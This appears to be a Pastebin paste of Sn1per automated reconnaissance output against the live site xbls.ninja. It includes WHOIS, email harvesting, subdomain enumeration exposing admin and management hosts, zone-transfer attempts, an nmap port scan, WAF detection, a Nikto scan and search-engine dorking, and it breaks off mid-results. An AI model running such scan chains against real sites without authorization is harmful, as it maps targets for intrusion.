Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~/Desktop/Sn1per# sniper xbls.ninja
- [ ok ] Starting postgresql (via systemctl): postgresql.service.
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sniper v2.5 by 1N3
- + -- ----------------------------=[Running Nslookup]=------------------------ -- +
- Server: 83.255.255.2
- Address: 83.255.255.2#53
- Non-authoritative answer:
- Name: xbls.ninja
- Address: 104.27.134.184
- Name: xbls.ninja
- Address: 104.27.135.184
- xbls.ninja has address 104.27.135.184
- xbls.ninja has address 104.27.134.184
- xbls.ninja mail is handled by 1 aspmx.l.google.com.
- xbls.ninja mail is handled by 5 alt1.aspmx.l.google.com.
- xbls.ninja mail is handled by 5 alt2.aspmx.l.google.com.
- xbls.ninja mail is handled by 10 aspmx2.googlemail.com.
- xbls.ninja mail is handled by 10 aspmx3.googlemail.com.
- + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is xbls.ninja
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 104.27.134.184. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 104.27.134.184. Module test failed
- [-] No distance calculation. 104.27.134.184 appears to be dead or no ports known
- [+] Host: 104.27.134.184 is up (Guess probability: 50%)
- [+] Target: 104.27.134.184 is alive. Round-Trip Time: 0.48672 sec
- [+] Selected safe Round-Trip Time value is: 0.97344 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [-] fingerprint:snmp: need UDP port 161 open
- [+] Primary guess:
- [+] Host 104.27.134.184 Running OS: PK'��U (Guess probability: 100%)
- [+] Other guesses:
- [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: PK'��U (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: PK'��U (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
- [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
- Domain Name: xbls.ninja
- Registry Domain ID: 797cae8d831442179a21f2b418b0fa4e-RSIDE
- Registrar WHOIS Server: whois.enom.com
- Registrar URL: http://enom.com
- Updated Date: 2017-01-10T22:21:50Z
- Creation Date: 2014-12-30T00:54:43Z
- Registry Expiry Date: 2017-12-30T00:54:43Z
- Registrar: ENom Inc.
- Registrar IANA ID: 48
- Registrar Abuse Contact Email: bpoier@tucowsinc.com
- Registrar Abuse Contact Phone: +42.55181929
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Registry Registrant ID: 150fa9836b784d08b150c601fb300044-RSIDE
- Registrant Name: AnonymousSpeech AnonymousSpeech
- Registrant Organization:
- Registrant Street: 1-3-3 Sakura House
- Registrant City: Tokyo
- Registrant State/Province:
- Registrant Postal Code: 164-0001
- Registrant Country: JP
- Registrant Phone: +81.9037462746
- Registrant Phone Ext:
- Registrant Fax:
- Registrant Fax Ext:
- Registrant Email: contact@anonymousspeech.com
- Registry Admin ID: f710c5e40410441f8212b323ef4d1b5b-RSIDE
- Admin Name: AnonyousSpeech AnonymousSpeech
- Admin Organization: AnonymousSpeech
- Admin Street: 1-3-3 Sakura House
- Admin City: Tokyo
- Admin State/Province: TOKYO
- Admin Postal Code: 169-0072
- Admin Country: JP
- Admin Phone: +81.9037462746
- Admin Phone Ext:
- Admin Fax: +81.9037462746
- Admin Fax Ext:
- Admin Email: contact@anonymousspeech.com
- Registry Tech ID: f710c5e40410441f8212b323ef4d1b5b-RSIDE
- Tech Name: AnonyousSpeech AnonymousSpeech
- Tech Organization: AnonymousSpeech
- Tech Street: 1-3-3 Sakura House
- Tech City: Tokyo
- Tech State/Province: TOKYO
- Tech Postal Code: 169-0072
- Tech Country: JP
- Tech Phone: +81.9037462746
- Tech Phone Ext:
- Tech Fax: +81.9037462746
- Tech Fax Ext:
- Tech Email: contact@anonymousspeech.com
- Name Server: molly.ns.cloudflare.com
- Name Server: chip.ns.cloudflare.com
- DNSSEC: signedDelegation
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of WHOIS database: 2017-07-13T06:03:45Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- Terms of Use: Users accessing the Rightside WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: Allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers. Enable high volume, automated, electronic processes that send queries or data to the systems of Rightside or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Rightside Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources.
- + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- sikovit@xbls.ninja
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 104.27.135.184:Chat.xbls.ninja
- 104.27.135.184:chat.xbls.ninja
- 209.141.39.114:irc.xbls.ninja
- 209.141.39.114:primary.xbls.ninja
- 69.162.67.141:status.xbls.ninja
- 104.27.135.184:www.xbls.ninja
- + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x xbls.ninja
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 44451
- ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;ninja.xbls.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017042788 1800 900 604800 3600
- ;; Query time: 1130 msec
- ;; SERVER: 83.255.255.2#53(83.255.255.2)
- ;; WHEN: Thu Jul 13 08:04:29 UTC 2017
- ;; MSG SIZE rcvd: 120
- dnsenum.pl VERSION:1.2.3
- ----- xbls.ninja -----
- Host's addresses:
- __________________
- xbls.ninja. 288 IN A 104.27.134.184
- xbls.ninja. 288 IN A 104.27.135.184
- Wildcard detection using: ntoedmyojsmp
- _______________________________________
- ntoedmyojsmp.xbls.ninja. 300 IN A 209.141.39.114
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Wildcards detected, all subdomains will point to the same IP address
- Omitting results containing 209.141.39.114.
- Maybe you are using OpenDNS servers.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Name Servers:
- ______________
- chip.ns.cloudflare.com. 86400 IN A 173.245.59.84
- molly.ns.cloudflare.com. 86400 IN A 173.245.58.205
- Mail (MX) Servers:
- ___________________
- aspmx2.googlemail.com. 293 IN A 108.177.97.26
- alt2.aspmx.l.google.com. 293 IN A 74.125.28.26
- aspmx.l.google.com. 293 IN A 64.233.164.26
- aspmx3.googlemail.com. 293 IN A 74.125.28.26
- alt1.aspmx.l.google.com. 293 IN A 108.177.97.26
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for xbls.ninja on chip.ns.cloudflare.com ...
- AXFR record query failed: FORMERR
- Trying Zone Transfer for xbls.ninja on molly.ns.cloudflare.com ...
- AXFR record query failed: FORMERR
- brute force file not specified, bay.
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for xbls.ninja
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- Bing: chat.xbls.ninja
- Bing: status.xbls.ninja
- Virustotal: irc.xbls.ninja
- Virustotal: status.xbls.ninja
- Virustotal: chat.xbls.ninja
- Virustotal: www.xbls.ninja
- SSL Certificates: status.xbls.ninja
- SSL Certificates: admin.xbls.ninja
- SSL Certificates: chat.xbls.ninja
- SSL Certificates: irc.xbls.ninja
- SSL Certificates: mail.xbls.ninja
- SSL Certificates: management.xbls.ninja
- SSL Certificates: the.xbls.ninja
- SSL Certificates: www.xbls.ninja
- Yahoo: status.xbls.ninja
- ThreatCrowd: the.xbls.ninja
- PassiveDNS: secondary.xbls.ninja
- PassiveDNS: tertiary.xbls.ninja
- PassiveDNS: primary.xbls.ninja
- PassiveDNS: irc.xbls.ninja
- PassiveDNS: the.xbls.ninja
- PassiveDNS: quaternary.xbls.ninja
- DNSdumpster: quaternary.xbls.ninja
- DNSdumpster: primary.xbls.ninja
- DNSdumpster: chat.xbls.ninja
- DNSdumpster: mail.xbls.ninja
- DNSdumpster: secondary.xbls.ninja
- DNSdumpster: tertiary.xbls.ninja
- DNSdumpster: irc.xbls.ninja
- Google: chat.xbls.ninja
- [-] Saving results to file: /usr/share/sniper/loot/domains/domains-xbls.ninja.txt
- [-] Total Unique Subdomains Found: 12
- www.xbls.ninja
- admin.xbls.ninja
- chat.xbls.ninja
- irc.xbls.ninja
- mail.xbls.ninja
- management.xbls.ninja
- primary.xbls.ninja
- quaternary.xbls.ninja
- secondary.xbls.ninja
- status.xbls.ninja
- tertiary.xbls.ninja
- the.xbls.ninja
- ╔═╗╦═╗╔╦╗╔═╗╦ ╦
- ║ ╠╦╝ ║ ╚═╗╠═╣
- ╚═╝╩╚═ ╩o╚═╝╩ ╩
- + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
- admin.xbls.ninja
- chat.xbls.ninja
- irc.xbls.ninja
- mail.xbls.ninja
- management.xbls.ninja
- status.xbls.ninja
- the.xbls.ninja
- www.xbls.ninja
- *.xbls.ninja
- [+] Domains saved to: /usr/share/sniper/loot/domains/domains-xbls.ninja-full.txt
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING xbls.ninja (104.27.134.184) 56(84) bytes of data.
- 64 bytes from 104.27.134.184: icmp_seq=1 ttl=58 time=10.9 ms
- --- xbls.ninja ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 10.984/10.984/10.984/0.000 ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:05 UTC
- Warning: 104.27.135.184 giving up on port because retransmission cap hit (2).
- Nmap scan report for xbls.ninja (104.27.135.184)
- Host is up (0.014s latency).
- Other addresses for xbls.ninja (not scanned): 104.27.134.184
- Not shown: 45 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- Nmap done: 1 IP address (1 host up) scanned in 3.68 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://xbls.ninja
- The site http://xbls.ninja is behind a CloudFlare
- Number of requests: 1
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- http://xbls.ninja [301 Moved Permanently] CloudFlare, Cookies[__cfduid], Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.27.134.184], RedirectLocation[https://xbls.ninja/], Strict-Transport-Security[max-age=31536000], Title[301 Moved Permanently], UncommonHeaders[x-content-type-options,x-sucuri-id,cf-ray], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
- https://xbls.ninja/ [403 Forbidden] CloudFlare, Cookies[__cfduid], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.27.134.184], Strict-Transport-Security[max-age=15552000], Title[Sucuri WebSite Firewall - Access Denied], UncommonHeaders[x-content-type-options,x-sucuri-id,cf-ray], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: xbls.ninja:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site not vulnerable to Cross-Frame Scripting!
- + -- --=[Site not vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Date: Thu, 13 Jul 2017 06:05:57 GMT
- Content-Type: text/html
- Content-Length: 177
- Connection: close
- Server: -nginx
- CF-RAY: -
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- HTTP/1.1 301 Moved Permanently
- Date: Thu, 13 Jul 2017 06:05:57 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- Set-Cookie: __cfduid=dd9b74b5afcbd656c7239f6e41a05baba1499925957; expires=Fri, 13-Jul-18 06:05:57 GMT; path=/; domain=.xbls.ninja; HttpOnly
- Location: https://xbls.ninja/
- X-XSS-Protection: 1; mode=block
- X-Frame-Options: SAMEORIGIN
- X-Content-Type-Options: nosniff
- Strict-Transport-Security: max-age=31536000
- X-Sucuri-ID: 15015
- Server: cloudflare-nginx
- CF-RAY: 37da0db273698637-ARN
- aa
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on xbls.ninja...
- X-Content-Type-Options: nosniff
- + -- --=[Checking if X-Frame options are enabled on xbls.ninja...
- X-Frame-Options: SAMEORIGIN
- + -- --=[Checking if X-XSS-Protection header is enabled on xbls.ninja...
- X-XSS-Protection: 1; mode=block
- + -- --=[Checking HTTP methods on xbls.ninja...
- + -- --=[Checking if TRACE method is enabled on xbls.ninja...
- + -- --=[Checking for META tags on xbls.ninja...
- + -- --=[Checking for open proxy on xbls.ninja...
- + -- --=[Enumerating software on xbls.ninja...
- Server: cloudflare-nginx
- + -- --=[Checking if Strict-Transport-Security is enabled on xbls.ninja...
- Strict-Transport-Security: max-age=31536000
- + -- --=[Checking for Flash cross-domain policy on xbls.ninja...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking for Silverlight cross-domain policy on xbls.ninja...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on xbls.ninja...
- + -- --=[Retrieving robots.txt on xbls.ninja...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Retrieving sitemap.xml on xbls.ninja...
- <html>
- <head><title>301 Moved Permanently</title></head>
- <body bgcolor="white">
- <center><h1>301 Moved Permanently</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking cookie attributes on xbls.ninja...
- Set-Cookie: __cfduid=d7e294dee909b879e0b542758bc0daedd1499925959; expires=Fri, 13-Jul-18 06:05:59 GMT; path=/; domain=.xbls.ninja; HttpOnly
- + -- --=[Checking for ASP.NET Detailed Errors on xbls.ninja...
- <body class="error404 wpb-js-composer js-comp-ver-5.1.1 vc_responsive">
- <h1 class="aligncenter">Error 404 - Not Found</h1>
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.135.184
- + Target Hostname: xbls.ninja
- + Target Port: 80
- + Start Time: 2017-07-13 08:05:27 (GMT0)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 37da0dc8c1eb865b-ARN
- + All CGI directories 'found', use '-C none' to test none
- + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
- + 26097 requests: 0 error(s) and 2 item(s) reported on remote host
- + End Time: 2017-07-13 08:13:31 (GMT0) (484 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/xbls.ninja-port80.jpg
- QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.
- content-type missing in HTTP POST, defaulting to application/x-www-form-urlencoded. Use QNetworkRequest::setHeader() to fix this problem.
- + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
- _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
- (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
- (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
- \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
- \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
- /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
- [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
- __[ ! ] Neither war between hackers, nor peace for the system.
- __[ ! ] http://blog.inurl.com.br
- __[ ! ] http://fb.com/InurlBrasil
- __[ ! ] http://twitter.com/@googleinurl
- __[ ! ] http://github.com/googleinurl
- __[ ! ] Current PHP version::[ 7.0.20-2 ]
- __[ ! ] Current script owner::[ root ]
- __[ ! ] Current uname::[ Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 ]
- __[ ! ] Current pwd::[ /usr/share/sniper ]
- __[ ! ] Help: php inurlbr.php --help
- ------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [13-07-2017 08:14:16]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-xbls.ninja.txt ]
- [ INFO ][ DORK ]::[ site:xbls.ninja ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.ws ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.tn ID: 010479943387663786936:wjwf2xkhfmq ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 19 ]
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 0 / 19 ]-[08:14:26] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 1 / 19 ]-[08:14:27] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/privacy/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 2 / 19 ]-[08:14:28] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/terms/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 3 / 19 ]-[08:14:29] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/account/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 4 / 19 ]-[08:14:29] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/contact/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 5 / 19 ]-[08:14:30] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/buy-steam ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 302 Moved Temporarily, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 6 / 19 ]-[08:14:30] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/browse/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 7 / 19 ]-[08:14:30] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/returns-and-refunds/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 8 / 19 ]-[08:14:31] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product-category/ninja-tokens/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 9 / 19 ]-[08:14:32] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/category/uncategorized/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 10 / 19 ]-[08:14:33] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-1-week/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 11 / 19 ]-[08:14:34] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-3-day/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 12 / 19 ]-[08:14:34] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-1-day/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 13 / 19 ]-[08:14:35] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-4-weeks/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 14 / 19 ]-[08:14:36] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-2-weeks/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 15 / 19 ]-[08:14:37] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/african-combo-token-31-day/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
